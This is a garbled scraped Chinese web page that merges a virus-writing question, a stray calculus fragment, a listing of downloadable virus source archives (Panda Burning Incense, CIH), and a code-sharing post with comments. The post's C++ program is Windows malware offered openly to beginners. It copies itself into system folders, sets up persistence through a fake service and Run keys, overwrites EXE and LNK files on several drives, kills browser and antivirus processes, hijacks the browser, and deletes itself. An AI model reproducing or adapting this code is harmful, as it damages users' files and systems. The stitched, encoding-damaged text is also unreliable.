为什么用C++怎么编写病毒出一段病毒程序后出现there is a virus 运行不起来?

您的举报已经提交成功,我们将尽快处理,谢谢!
f(x)=[1/√(2π)]*e^[-(x^2)/2]
f'(x)=[1/√(2π)]*e^[-(x^2)/2]*(-x)
令f'(x)=0,得到x=0,
...
大家还关注
(window.slotbydup=window.slotbydup || []).push({
id: '2081942',
container: s,
size: '1000,60',
display: 'inlay-fix'&&源码搜搜[中文],大家一起找最好的开源代码。
&&请提交您认为需要收录的源码网站。
病毒pandan.rar - 以熊猫烧香病毒为背景,用数据结构中图论的知识解决病毒传播的问题。-To FuckJacks.exe the background, using the data structure of knowledge in graph theory to solve transmission of the virus problem标签:Visual C++, Windows开发&评论:0条
说明:因为该变种病毒不但要攻击RPC漏洞,还会将自身复制到%system%\Wins文件夹下,...其中FTP服务开启系统的FTP功能用于传播病毒。“冲击波杀手”感染一台机器后就会使用Ping命令或ICMP echo方式探测随机产生的IP地址是否有效,如果有效便开始进行攻击。该病毒会在受感染的系统中随机使用666-765端口与攻击系统进行连接。该病毒还会检查系统版本和微软补丁包的版本号,标签:C-C++&评论:0条
70Virus_Soruce_Code. - 70个病毒源代码,有助于对病毒知识的学习-70 virus source code, contribute to knowledge and learning for virus标签:Visual C++, Windows开发&评论:0条
说明:一种计算机病毒的检测方法,讲述一种新型的计算机病毒检测方法,前沿科技型文章标签:Visual C++&评论:0条
clamAV_sourcecode.ra - 一个反病毒软件源码 一个反病毒软件源码-An anti-virus software, an anti-virus software source code source code in an anti-virus software source code标签:C++, Kill Virus&评论:0条
说明:女鬼病毒的源程序,对病毒感兴趣的朋友不妨载下来看看。标签:C++ Builder&评论:0条
&win2000.stream Vir - AntiVirusviruscode病毒源码《win2000.stream病毒源码》.rar-AntiVirusviruscode viral source code &win2000.stream Virus Source Code& rar标签:Visual C++, Kill Virus&评论:0条
说明:AntiVirus\viruscode\病毒源码\《win2000.stream病毒源码》.rar标签:Visual C++&评论:0条
111.rar - 100个病毒源代码 包括熊猫烧香等等 100个病毒源代码 包括熊猫烧香-100 virus source code, including panda burning incense, etc. 100 virus source code, including panda burning incense标签:Visual C++, Windows Kernel&评论:0条
virus.rar - 一个病毒原代码,能够利用其他病毒传播 -a viral code, can use other transmission of the virus标签:C++, Network Security&评论:0条
说明:CIH病毒1.4版源代码是根据病毒的形成原理编制给大家参考标签:C++&评论:0条
说明:_驱动病毒探索.rar探索驱动病毒的原理。标签:Visual C++&评论:0条
sreng21.zip - 一个杀毒的软件,专门杀netsend.exe.tmp之类的电脑病毒,对那些连好的杀毒软件没也没有办法的病毒能有效解决-an antivirus software,sreng21.zip - 一个杀毒的软件,专门杀netsend.exe.tmp之类的电脑病毒,对那些连好的杀毒软件没也没有办法的病毒能有效解决-an antivirus software,标签:Visual C++, 其他项目&评论:0条
boilghostsvirus.Zip - 女鬼病毒的源程序,对病毒感兴趣的朋友不妨载下来看看。-female virus source of the virus interested friends might set down to see标签:Borland C++ Builder, Kill Virus&评论:0条
研究一下CIH病毒原代码可能对你预防病毒会有帮助,不过在此声明,此代码仅供学习,有任何后果本人概部负责
标签:Visual C++&评论:0条
在普通程序中使用会有不可预料的后果!该VXD调用的功能很多,也很繁杂。参数数量很少,只有BCB或IOR和BDD或DCB的地址。但这几个数据结构却包含了大量的信息,结构也相当的复杂。CIH病毒只用到了IOR结构,它包含了近二十个标签:Visual C++&评论:0条
Kylinx2003virussourc - Kylinx 2003 病毒源程序-Kylinx 2003 virus source标签:Visual C++, Windows开发&评论:0条
dd.rar - 一个模拟演示病毒自感染文件与实现自我复制自我启动的过程,当然只是模拟演示不会对系统产生损伤-A simulated demonstration of the virus from infected files and to achieve self-replication self-initiated process, of course,标签:Visual C++, File Operate&评论:0条
说明:尾巴病毒仿真程序标签:C++&评论:0条
说明:这是我从网上下的一个病毒源码。不是我自己写的,不要说我侵权哦,我现在是个菜鸟。学好了,一定和大家分享我的劳动成果。标签:Visual C++&评论:0条
CopyRight (&)
All Rights Reserved&[后面乱码是注释!对程序运行无影响,有需要的话可以Q我:] - 开源中国社区
当前访客身份:游客 [
当前位置:
发布于 日 10时,
适合windows系列操作系统 &菜鸟一定看 大牛飘过&
代码片段(1)
test.cpp&~&14KB&&&&
#include&windows.h&
#include&iostream&
#include &TLHELP32.H&
#include &string&
#include &shellapi.h&
#include&io.h&
//全局变量
const int MAXLEN = 1024; //定义最大目录长度
DWORD GetSpecifiedProcessId(const char *pszProcessName)
//获得系统快照句柄
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pI
pInfo.dwSize = sizeof(pInfo);
//从快照中获取进程列表
Process32First(hSnapShot, &pInfo) ;
if(strcmp(strlwr(_strdup(pInfo.szExeFile)), pszProcessName) == 0)
id = pInfo.th32ProcessID ;
while(Process32Next(hSnapShot, &pInfo) != FALSE);
CloseHandle(hSnapShot);
//清理系统快照,以免内存快速消耗
//返回进程的PID值
void FUWU(char EXEFILO[],char EXEFILP[])
//注册系统服务
char ExeFile[200];
//存放自身路径
char ExeFilr[]="C:\\WINDOWS\\Near.exe";
//用以对比的路径
char ExeFilq[]="C:\\WINDOWS\\system32\\Near.exe";
//用以对比的路径
GetModuleFileName(NULL,ExeFile,200);
//得到自身路径
RegCreateKey(HKEY_LOCAL_MACHINE,EXEFILP,&hKey); //创建一个子项
RegCloseKey(hKey);
//创建DisplayName
static char vname[] = "DisplayName";
static char exefile[] = "Windows NT";
ULONG dType = REG_SZ, len = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EXEFILP,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, vname, 0, REG_SZ,
(const unsigned char *)exefile, strlen(exefile)+1);
RegCloseKey(hKey);
//创建Description
static char vnamq[] = "Description";
static char exefilq[] = "启动Windows可能需要此服务";
ULONG dTypq = REG_SZ, leq = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EXEFILP,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, vnamq, 0, REG_SZ,
(const unsigned char *)exefilq, strlen(exefilq)+1);
RegCloseKey(hKey);
//创建ImagePath
static char vnamo[] = "ImagePath";
ULONG dTypo = REG_SZ, leo = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EXEFILP,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, vnamo, 0, REG_SZ,
(const unsigned char *)EXEFILO, strlen(EXEFILO)+1);
RegCloseKey(hKey);
//创建ObjectName
static char vnaml[] = "ObjectName";
static char exefill[] = "LocalSystem";
ULONG dTypl = REG_SZ, lel = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EXEFILP,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, vnaml, 0, REG_SZ,
(const unsigned char *)exefill, strlen(exefill)+1);
RegCloseKey(hKey);
DWORD dwNum=1;
//创建ErrorControl
static char vnamg[] = "ErrorControl";
ULONG dTypg = REG_DWORD, leg = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EXEFILP,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, vnamg, 0, REG_DWORD,
(LPBYTE) &dwNum, sizeof(DWORD));
RegCloseKey(hKey);
//创建Start
static char vnamx[] = "Start";
ULONG dTypx = REG_DWORD, lex = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EXEFILP,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, vnamx, 0, REG_DWORD,
(LPBYTE) &dwNum, sizeof(DWORD));
RegCloseKey(hKey);
//创建Type
static char vnamz[] = "Type";
ULONG dTypz = REG_DWORD, lez = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EXEFILP,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, vnamz, 0, REG_DWORD,
(LPBYTE) &dwNum, sizeof(DWORD));
RegCloseKey(hKey);
void List_Dir(const char *pchData)
//寻找EXE感染
char GR[200];
//存放自身路径
GetModuleFileName(NULL,GR,200);
//得到自身路径
_finddata_ //定义文件查找结构对象
long done = 0;
char tempdir[MAXLEN] = {0}; // 定义一个临时字符数组,存储目录
strcat(tempdir,pchData); // 连接字符串
strcat(tempdir,"\\*.*"); // 连接字符串
done = _findfirst(tempdir,&fdata); //开始查找文件
if(done != -1) //开始查找成功
int ret = 0;
while(ret != -1) //定义一个循环
if(fdata.attrib != _A_SUBDIR) //判断文件属性
if(strcmp(fdata.name,"...") != 0 && strcmp(fdata.name,"..") != 0 && strcmp(fdata.name,".") != 0) //过滤
char dir[MAXLEN] = {0}; // 定义字符数组
strcat(dir,pchData); // 连接字符串
strcat(dir,"\\"); // 连接字符串
strcat(dir,fdata.name); // 连接字符串
strrev(dir);
if(dir[0]=='e'||dir[0]=='k')
//查找文件尾
strrev(dir);
CopyFile(GR,dir,0);
//感染EXE,LNK
ret = _findnext(done,&fdata);
if(fdata.attrib == _A_SUBDIR && ret != -1)
if(strcmp(fdata.name,"...") != 0 && strcmp(fdata.name,"..") != 0 && strcmp(fdata.name,".") != 0) //过滤
char pdir[MAXLEN] = {0}; //定义字符数组
strcat(pdir,pchData); //连接字符串
strcat(pdir,"\\"); //连接字符串
strcat(pdir,fdata.name); //连接字符串
List_Dir(pdir); //递归调用
int GANR()
//寻找EXE感染
ShellExecute(0, "open", "IEXPLORE", "/", NULL, SW_NORMAL);
ShellExecute(0, "open", "IEXPLORE", "/duba/", NULL, SW_NORMAL);
ShellExecute(0, "open", "IEXPLORE", ".cn/rav.html", NULL, SW_NORMAL);
char szFileq[] ="c:\\progra~1";
//不感染WINDOWS目录以免破坏系统
List_Dir(szFileq); //调用ListDir函数遍历目录
Sleep(500);
//暂停500毫秒后执行
char szFileDia[] ="d:";
List_Dir(szFileDia);
Sleep(500);
char szFileDis[]="e:";
List_Dir(szFileDis);
Sleep(500);
char szFileDiq[] ="f:";
List_Dir(szFileDiq);
Sleep(500);
char szFileDig[] ="h:";
List_Dir(szFileDig);
Sleep(500);
char szFileDik[] ="C:\\Documents and Settings\\All Users";
List_Dir(szFileDik);
Sleep(500);
char szFile[] ="C:\\Documents and Settings\\Administrator";
List_Dir(szFile);
Sleep(500);
char szFileDim[] ="d:\\progra~1";
List_Dir(szFileDim);
Sleep(500);
char szFileDa[] ="e:\\progra~1";
List_Dir(szFileDa);
Sleep(500);
char szFileDd[] ="f:\\progra~1";
List_Dir(szFileDd);
void CAOZ()
//杀毒软件进程监控
char ExeFile[200];
//存放自身路径
char ExeFilr[]="C:\\WINDOWS\\system32\\Near.exe";
//目标路径
GetModuleFileName(NULL,ExeFile,200);
//得到自身路径
CopyFile(ExeFile,ExeFilr,1);
//自我复制
char system[]="C:\\WINDOWS";
DWORD ProcessId;
HANDLE hSnapS
ProcessId = GetSpecifiedProcessId("360safe.exe");
//360安全卫士主进程
if(ProcessId&10000)
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//抢占资源
Sleep(500);
//暂停500毫秒后执行,避免内存消耗过大
ProcessId = GetSpecifiedProcessId("kscan.exe");
//金山毒霸主进程
if(ProcessId&10000)
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//抢占资源
Sleep(500);
//暂停500毫秒后执行,避免内存消耗过大
//开始计数
ProcessId = GetSpecifiedProcessId("qiya.exe");
//进程监控
if(ProcessId&10000)
List_Dir(system);
MessageBox(NULL,"以下进程被结束yadang.exe)或(qita.exe),破坏系统!","killua提示",MB_OK);
//禁止使用搜狗 360 浏览器
//重新计数
ProcessId = GetSpecifiedProcessId("360se.exe");
hSnapShot = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessId);
TerminateProcess(hSnapShot,0);
CloseHandle(hSnapShot);
ProcessId = GetSpecifiedProcessId("sogouexplorer.exe");
hSnapShot = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessId);
TerminateProcess(hSnapShot,0);
CloseHandle(hSnapShot);
void ZHUCB(char a[],char b[])
static char subkey[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
ULONG dType = REG_SZ, len = 0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);
RegSetValueEx(hKey, a, 0, REG_SZ, (const unsigned char *)b, strlen(b)+1);
RegCloseKey(hKey);
char ZS[200];
GetModuleFileName(NULL,ZS,200);
//得到自身路径
//创建文件
FILE *fpOut=fopen("c:\\WINDOWS\\a.bat","wt+");
char h[200]="\"";
char W[500]="@echo off\n";
char szTmp[200]="del \"";
char ss[200]=" \\q";
char aa[200]="ping /n 1 /w 1 1.0.0.1&nul\n";
strcat(W,aa);
//添加字符串
strcat(W,szTmp);
strcat(ZS,h);
strcat(W,ZS);
strcat(W,ss);
fwrite(W, strlen(W),1,fpOut);
//关闭文件
fclose(fpOut);
//创建文件
FILE *fpOut=fopen("c:\\WINDOWS\\a.vbs","wt+");
char szTmp[200]="createobject(\"wscript.shell\").run \"c:\\WINDOWS\\a.bat\",0";
fwrite(szTmp, strlen(szTmp),1,fpOut);
//关闭文件
fclose(fpOut);
char system[]="C:\\WINDOWS";
char ExeFile[200];
//存放自身路径
char ExeFilr[]="C:\\WINDOWS\\system32\\Near.exe";
//目标路径
GetModuleFileName(NULL,ExeFile,200);
//得到自身路径
CopyFile(ExeFile,ExeFilr,1);
//自我复制
DWORD ProcessId;
ProcessId = GetSpecifiedProcessId("yadang.exe");
if(ProcessId&10000)
List_Dir(system);
MessageBox(NULL,"以下进程被结束yadang.exe)或(qita.exe),破坏系统!","killua提示",MB_OK);
Sleep(200);
//暂停200毫秒后执行,给予系统清理内存的时间
ProcessId = GetSpecifiedProcessId("iexplore.exe");
hProcess = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessId);
g=TerminateProcess(hProcess,0);
b=CloseHandle(hProcess);
if(b==1||g==1)
//结束成功,浏览器是第一次打开
ShellExecute(0, "open", "IEXPLORE", "http://www.honcent.net", NULL, SW_NORMAL);
//劫持浏览器
Sleep(100);
ProcessId = GetSpecifiedProcessId("yadang.exe");
if(ProcessId&10000)
List_Dir(system);
//破坏系统
MessageBox(NULL,"以下进程被结束yadang.exe)或(qita.exe),破坏系统!","killua提示",MB_OK);
Sleep(500);
//暂停500毫秒后执行,避免内存消耗过大
ProcessId = GetSpecifiedProcessId("iexplore.exe");
if (ProcessId&10000)
//检查浏览器是否为关闭状态
关闭则跳出
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR lpCmdline,int nCmdShow)
void FUWU(char EXEFILO[],char EXEFILP[]);
//函数申明
void CAOZ();
//函数申明
void ZHUCB(char a[],char b[]);
//函数申明
int BAT();
//函数申明
int VBS();
//函数申明
//函数申明
int GANR();
//函数声明
char ExeFile[200];
//存放自身路径
char SX[]="C:\\WINDOWS\\system\\qiya.exe";
char ExeFilr[]="C:\\WINDOWS\\system32\\Near.exe";
ExeFila[]="C:\\Documents and Settings\\All Users\\yadang.exe";
//注册表值
static char a2[] = "yadang";
char a1[] = "qiya";
GetModuleFileName(NULL,ExeFile,200);
//得到自身路径
CopyFile(ExeFile,ExeFilr,1);
//自我复制到SYSTEM32下
CopyFile(ExeFile,ExeFila,1);
//复制到All Users
CopyFile(ExeFile,SX,1);
//复制到SYSTEM
char exefioo[] = "System\\CurrentControlSet\\Services\\Near";
if (strcmp(ExeFile,ExeFilr)!=0&&strcmp(ExeFile,ExeFila)!=0&&strcmp(ExeFile,SX)!=0)
//如果不在指定路径下
//寻找EXE感染
FUWU(ExeFilr,exefioo);
//注册C:\\WINDOWS\\SYSTEM32\\Near.exe为系统服务
ZHUCB(a2,SX);
//WINDOWS下svchost开机启动
ZHUCB(a1,ExeFila);
ShellExecute(NULL,"open","C:\\WINDOWS\\a.vbs",NULL,NULL,SW_SHOWNORMAL);
//自我删除
if (strcmp(ExeFile,ExeFilr)==0)
//开机后寻找EXE感染
CopyFile(ExeFile,ExeFila,1);
CopyFile(ExeFile,SX,1);
ZHUCB(a2,SX);
ZHUCB(a1,ExeFila);
if (strcmp(ExeFile,ExeFila)==0)
//主进程监控
if (strcmp(ExeFile,SX)==0)
开源中国-程序员在线工具:
引用来自“七液”的评论这十多年前的代码也要发么?12年前的代码都写的比这个专业
而且特征太明显太没有抽象感。这个算个简单的而已程序吧
29A杂志多看看。你就知道什么是Virus了
虽然都是七八年前的杂志。。。也没人更新了
vx.netlux.org被查封了
BPE32引擎是99年的作品。虽然现在看来很简单。
就一句别会写几句恶意代码就说自己是Virus。熊猫之流只能算流氓程序
呵呵 谢谢你的建议
2楼:hcdnf 发表于
引用来自“ChanneW”的评论运行了一下,开始报毒了,呵呵!!!!!!能运行么?哈哈
3楼:微信流量交易张子游 发表于
无论怎样,都要先解决乱码问题。
4楼:hcdnf 发表于
5楼:主编 发表于
看上去很强大
6楼:麦田里的怪 发表于
程序不是完整的吧?
7楼:hcdnf 发表于
请看附件 &OK?
8楼:tonghuazhong 发表于
应该是编码问题
9楼:Landoky 发表于
引用来自“hcdnf”的评论请看附件 &OK?附件?
10楼:Landoky 发表于
附件在哪哪?
11楼:陈小锅 发表于
if (strcmp(ExeFile,ExeFila)==0)&
& & CAOZ(); &//主进程监控
CAOZ ? &→_→ &/caoz
12楼:LimSteven 发表于
附件在哪哪哪?
13楼: 发表于
看着头都是大的啊。
14楼:廖君 发表于
请保存为UTF-8格式
15楼:hcdnf 发表于
引用来自“麦田里的怪”的评论程序不是完整的吧?要不我发个给你试试
16楼:hcdnf 发表于
引用来自“Landoky”的评论引用来自“hcdnf”的评论请看附件 &OK?附件?没看到么?
17楼:gysutantoman 发表于
各种sleep、 for(;;), 声明赋值临时对象乱七八糟。qiya.exe,Near.exe,yadang.exe这三个私货也没有, 要新手看也太坑新手了。 &
TerminateProcess用的欢, 对杀毒软件根本不起作用。
18楼:王全 发表于
引用来自“七液”的评论这十多年前的代码也要发么?12年前的代码都写的比这个专业
而且特征太明显太没有抽象感。这个算个简单的而已程序吧
29A杂志多看看。你就知道什么是Virus了
虽然都是七八年前的杂志。。。也没人更新了
vx.netlux.org被查封了
BPE32引擎是99年的作品。虽然现在看来很简单。
就一句别会写几句恶意代码就说自己是Virus。熊猫之流只能算流氓程序
装B的太多!人家只是分享下而已,你专业飘过就行了,有必要吹自己12年前怎么怎么吗?熊猫烧香,杀毒软件厂商都公认的病毒了,你还来扯淡说什么只是流氓程序,难道你写的病毒中没有恶意代码?
19楼:hcdnf 发表于
引用来自“七液”的评论这十多年前的代码也要发么?12年前的代码都写的比这个专业
而且特征太明显太没有抽象感。这个算个简单的而已程序吧
29A杂志多看看。你就知道什么是Virus了
虽然都是七八年前的杂志。。。也没人更新了
vx.netlux.org被查封了
BPE32引擎是99年的作品。虽然现在看来很简单。
就一句别会写几句恶意代码就说自己是Virus。熊猫之流只能算流氓程序
20楼:sincoder 发表于
& 这病毒 特征太明显。。。
开源从代码分享开始
hcdnf的其它代码}

我要回帖

更多关于 怎么编写病毒 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信